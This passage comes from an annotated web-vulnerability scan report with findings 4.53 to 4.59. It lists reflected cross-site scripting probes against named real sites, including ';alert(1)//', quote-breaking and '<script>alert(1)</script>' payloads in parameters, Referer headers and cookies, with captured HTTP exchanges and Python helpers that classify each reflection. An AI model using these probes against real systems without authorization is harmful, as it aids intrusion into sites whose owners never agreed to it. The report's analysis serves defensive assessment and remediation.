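    the value is a query-string component, then HTML-encode because that URL
    sits inside an attribute. The encoding, not a blocklist, keeps the value
    inside the href."""
    return ('<a href="../System/SearchResults.aspx?.%s=1&amp;k=">'
            % html.escape(quote(decoded, safe=""), quote=True))


def handle_request_hardened(raw_name):
    """Validate (control characters, length), then encode; no blocklist."""
    decoded = decode_param(raw_name)
    if not validate(decoded):
        return None
    return render_hardened(decoded)
```

Running the clean name through the C-style filter is rejected, the %00-prefixed one passes and lands raw in the href; the full-string blocklist rejects both, but only because these particular characters are on its list. The hardened path rejects the NUL outright and, for the clean name, emits a link in which the payload's quote and angle brackets are percent-encoded, so the parser never sees them as markup.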

4.53. http://www.secureconnect.com/rssReplayProxy.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Issue detail

The scanner attributes this reflection to the name of an arbitrarily supplied request parameter, but the request shown injects the payload into the value of source (splitting secure1), so it is the same sink as 4.54. The payload c0842%3balert(1)//395063d27b0 was submitted and was echoed as c0842;alert(1)//395063d27b0 in the application's response.

What the captured response shows is that ; ( ) and / are reflected without encoding into a one-line error message served as text/html. No <script> element or other JavaScript context is visible in that body, so the ;alert(1)// form of the payload would not execute there as shown. Confirming an exploitable XSS in this response needs a payload that brings its own markup, and the question is whether < and > are echoed raw as well; that test is not shown here.

Request

GET /rssReplayProxy.php?cache=true&source=sec/c0842%3balert(1)//395063d27b0ure1 HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:51:21 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 99
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID sec/c0842;alert(1)//395063d27b0ure1

4.54. http://www.secureconnect.com/rssReplayProxy.php [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Issue detail

The value of the source request parameter is copied into the application's response. The payload 1a571%3balert(1)//bd3ba58ca17 was submitted in the source parameter and was echoed as 1a571;alert(1)//bd3ba58ca17, which is why the scanner reports an unquoted JavaScript expression context.

As in 4.53, the captured response is a one-line error message served as text/html with no <script> element or other JavaScript context visible, so the ;alert(1)// form of the payload would not execute there as shown. The response does establish that ; ( ) and / survive unencoded; whether < and > do too, which is what a markup payload would need, is not shown here.

Request

GET /rssReplayProxy.php?cache=true&source=secure11a571%3balert(1)//bd3ba58ca17 HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmc=32024892; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:48:27 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 98
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID secure11a571;alert(1)//bd3ba58ca17
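
When the scanner reports a payload as "echoed unmodified", the thing to check is which characters actually came back raw and what happened to the rest, because that is what separates 4.46 (the quote and semicolon survive inside a JavaScript string) from 4.40 (the parentheses survive, but the angle brackets in the earlier path segment are still percent-encoded) and from 4.53/4.54 (a bare error line where ; ( ) / survive but no markup context is visible). The following helper is an added example, not part of the report or of Burp. It locates the probe between the random hex prefix and suffix the scanner wraps around it and reports which metacharacters survived and how the echo relates to the submitted payload. The three sample bodies are copied from the response excerpts in 4.40, 4.46 and 4.54.

```python
"""Check what "echoed unmodified" means in a captured response.

Added example for this page; not code from the report or from the scanner.
The sample bodies are the response excerpts shown in 4.40, 4.46 and 4.54.
"""
import html
import re
from urllib.parse import quote

METACHARS = "<>\"'();/"

SAMPLE_440 = ("Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3E"
              "cf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf")
SAMPLE_446 = "   var lpip = '923178d39c';alert(1)//86fb6401f85';"
SAMPLE_454 = ("RSS Replay Proxy Error: No matching source for the specified ID "
              "secure11a571;alert(1)//bd3ba58ca17")


def find_probe(body, prefix, suffix):
    """Text echoed between the scanner's random prefix and suffix, or None."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None


def survivors(echoed, payload):
    """Split the payload's metacharacters into those that appear raw in the echo
    and those that came back transformed (entity, percent-encoding, dropped)."""
    raw, transformed = [], []
    for ch in sorted(set(payload) & set(METACHARS)):
        (raw if ch in echoed else transformed).append(ch)
    return raw, transformed


def classify(echoed, payload):
    """Coarse verdict: how the echo relates to the submitted payload."""
    if echoed is None:
        return "not reflected"
    if echoed == payload:
        return "unmodified"
    if echoed == html.escape(payload, quote=True):
        return "html-encoded"
    if echoed == quote(payload, safe=""):
        return "percent-encoded"
    return "partially modified"


def audit(body, prefix, suffix, payload):
    """One record per probe: the echo, a verdict, and the metacharacter split."""
    echoed = find_probe(body, prefix, suffix)
    raw, transformed = survivors(echoed or "", payload)
    return {"echoed": echoed, "verdict": classify(echoed, payload),
            "raw": raw, "transformed": transformed}


if __name__ == "__main__":
    # The 4.40 case: the probe in parameter 2 is intact, but the <script> that
    # was placed in parameter 1 comes back with its angle brackets still encoded.
    print(audit(SAMPLE_440, "5721a", "e0872078c2d", "(a)"))
    print(audit(SAMPLE_440, "inc5c69f", "cf590911e53",
                "<script>alert(document.cookie)</script>"))
    print(audit(SAMPLE_446, "8d39c", "86fb6401f85", "';alert(1)//"))
    print(audit(SAMPLE_454, "1a571", "bd3ba58ca17", ";alert(1)//"))
```

The second audit of the 4.40 body is the one that explains the scanner's "not successful" note: the parentheses and slash are raw, the angle brackets are not, so any payload that needs a tag is dead on arrival in that sink while a payload that only needs ( ) would still be reflected. Pass the payload in its decoded form (';alert(1)// rather than '%3balert(1)//), since that is what the server compared and echoed.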

4.55. http://adserving.cpxinteractive.com/st [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1a49'-alert(1)-'60927c08fe6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1712152 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a1a49'-alert(1)-'60927c08fe6
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 13:46:52 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 26 Apr 2011 13:46:52 GMT
Content-Length: 359

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1712152&referrer=http://www.google.com/search%3Fhl=en%26q=a1a49'-alert(1)-'60927c08fe6&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1712152">
...[SNIP]...

4.56. http://player.vimeo.com/config/14606948 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://player.vimeo.com
Path:   /config/14606948

Issue detail

The value of the Referer HTTP header is copied into a JSON string in a response served as application/json (the referrer field of the request object). The payload 75f59<a>71ad99134ed was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response: the serializer escaped the forward slashes of the URL as \/ but left < and > raw.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. Because the response is JSON rather than HTML, a browser does not render the injected tag directly; it becomes a risk only if client-side code writes the referrer value into the DOM without encoding, which was not established here. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. The Referer is only a partial exception: it carries the URL of the page that issued the request, so an attacker who can get a victim to load an attacker-chosen URL that triggers this request controls the header's contents, subject to the browser percent-encoding some metacharacters before sending it. In the past, methods have also existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /config/14606948?type=moogaloop_embed&referrer=http%3A%2F%2Fwww.hugthecloud.com%2F&fullscreen=1&color=00ADEF&autoplay=0&server=vimeo.com&show_title=1&loop=0&show_byline=1&player_server=player.vimeo.com&show_portrait=1&cdn_server=a.vimeocdn.com HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=75f59<a>71ad99134ed
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303747424.3.3.utmcsr=customermagnetism.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=256147786.658057560.1303432520.1303575918.1303747424.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.67
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/json
Content-Length: 2460

{"request":{"cached_timestamp":1303823915,"source":"cache","signature":"ecc9f539b2ef60040c00a6358da3153e","timestamp":1303823921,"referrer":"http:\/\/www.google.com\/search?hl=en&q=75f59<a>71ad99134ed","vimeo_url":"vimeo.com","player_url":"player.vimeo.com","cdn_url":"a.vimeocdn.com","cookie_domain":".vimeo.com"},"video":{"id":14606948,"title":"VMworld vCloud Datacenter","width":640,"height":360,"d
...[SNIP]...

4.57. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload 22b9a<script>alert(1)</script>2f6897011f9 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-130334904622b9a<script>alert(1)</script>2f6897011f9

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:18 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827678; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
41023&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-130334904622b9a<script>alert(1)</script>2f6897011f9', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...
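The difference between 4.55 and 4.57 is the reflection context, not the echo: in 4.55 the probe's quote ends the string literal in the document.write call, while in 4.57 the <script> tags sit inside a literal that is still open in a JavaScript file. The following Python is an added example, not code from the XSS.CX report or from Burp Suite, that makes this check explicit: it tracks JavaScript string-literal state across a response body and labels each occurrence of a probe as inside a literal, in code, or breaking out of a literal. The response samples are shortened reconstructions of the lines shown in 4.55, 4.56 and 4.57 (the "fixed" variant with a backslash-escaped quote is constructed, not observed), and the function names are this example's own.

```python
# Added example, not part of the XSS.CX / Burp report: classify where a
# reflected probe landed in a JavaScript (or JSON) response body. The
# samples are shortened, constructed versions of the response lines shown
# in 4.55, 4.56 and 4.57; the probe strings are the ones the report sent.


def string_literal_states(src):
    """One entry per character of src: the quote character of the string
    literal the character belongs to (delimiters included), or None for
    code outside any literal. Tracks backslash escapes. It deliberately
    ignores comments, regex and template literals, which do not occur in
    the response snippets examined here."""
    states = []
    quote = None
    escaped = False
    for ch in src:
        if quote is None:
            if ch in "'\"":
                quote = ch
            states.append(quote)          # None for code, else the delimiter
            continue
        states.append(quote)
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == quote:
            quote = None
    return states


def classify_reflections(src, probe):
    """For every occurrence of probe in src, report one of:
    'string-literal': wholly inside one quoted literal, so < > and tags
                      are inert JavaScript-wise (the 4.56 and 4.57 cases);
    'code':           wholly outside any literal;
    'breaks-out':     the probe crossed a literal boundary, i.e. a quote in
                      it terminated the string and what follows is parsed
                      as code (the 4.55 case)."""
    states = string_literal_states(src)
    labels = []
    start = src.find(probe)
    while start != -1:
        end = start + len(probe)
        # Look one character before and after the probe as well: if the
        # probe's last character closed the literal, the application's own
        # text has become code, which is just as much a breakout.
        seen = set(states[max(start - 1, 0):end + 1])
        if len(seen) > 1:
            labels.append("breaks-out")
        elif None in seen:
            labels.append("code")
        else:
            labels.append("string-literal")
        start = src.find(probe, end)
    return labels


# Constructed, shortened response samples (the report's lines are longer).
PROBE_4_55 = "a1a49'-alert(1)-'60927c08fe6"
SAMPLE_4_55 = (
    "document.write('<scr'+'ipt type=\"text/javascript\" "
    "src=\"http://ib.adnxs.com/ptj?member=541&referrer="
    "http://www.google.com/search%3Fhl=en%26q=" + PROBE_4_55
    + "&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst\">');"
)
# What 4.55 would look like had the server escaped the value for a
# JavaScript string context (constructed, not observed).
ESCAPED_4_55 = PROBE_4_55.replace("'", "\\'")
FIXED_4_55 = SAMPLE_4_55.replace(PROBE_4_55, ESCAPED_4_55)

PROBE_4_57 = "22b9a<script>alert(1)</script>2f6897011f9"
SAMPLE_4_57 = (
    "COMSCORE.BMX.Broker.Cookies={ \"ar_s_p81479006\": '1', "
    "\"UID\": '875e3f1e-184.84.247.65-1303349046" + PROBE_4_57 + "', "
    "\"ar_p81479006\": 'exp=1&prad=58779362&arc=40314462&' };"
)

PROBE_4_56 = "75f59<a>71ad99134ed"
SAMPLE_4_56 = (
    '{"request":{"source":"cache","referrer":'
    '"http:\\/\\/www.google.com\\/search?hl=en&q=' + PROBE_4_56 + '",'
    '"vimeo_url":"vimeo.com"}}'
)

if __name__ == "__main__":
    for name, src, probe in [("4.55 as served", SAMPLE_4_55, PROBE_4_55),
                             ("4.55 with escaping", FIXED_4_55, ESCAPED_4_55),
                             ("4.56 (JSON)", SAMPLE_4_56, PROBE_4_56),
                             ("4.57", SAMPLE_4_57, PROBE_4_57)]:
        print(name, classify_reflections(src, probe))
```

Only the 4.55 sample yields "breaks-out"; the 4.56 and 4.57 samples stay "string-literal", which is why their <script> and <a> tags prove reflection but not execution. Re-running the classifier on the constructed escaped variant shows the same payload becoming harmless once the quote is escaped, which is the server-side fix for that context.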

4.58. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload bdd23<script>alert(1)</script>c65f51aafdf was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&bdd23<script>alert(1)</script>c65f51aafdf; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:16 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&bdd23<script>alert(1)</script>c65f51aafdf', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

4.59. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into a single-quoted JavaScript string literal in a response served as application/x-javascript (the COMSCORE.BMX.Broker.Cookies object echoes the request's cookies). The payload 5d13e<script>alert(1)</script>263d747e74f was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

As returned, the echoed <script> tags are inert: they sit inside a JavaScript string literal and the response is not HTML. The payload contains no single quote or backslash, so it did not terminate the literal; demonstrating script execution would require a payload that closes the quoted string, which this probe does not show. The finding stands as an absence of output encoding in a JavaScript string context rather than as a working proof-of-concept.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5d13e<script>alert(1)</script>263d747e74f; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:16 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:16 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827676; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...
Apr 25 14:20:50 2011&prad=253732017&arc=194941023&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&5d13e<script>alert(1)</script>263d747e74f', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

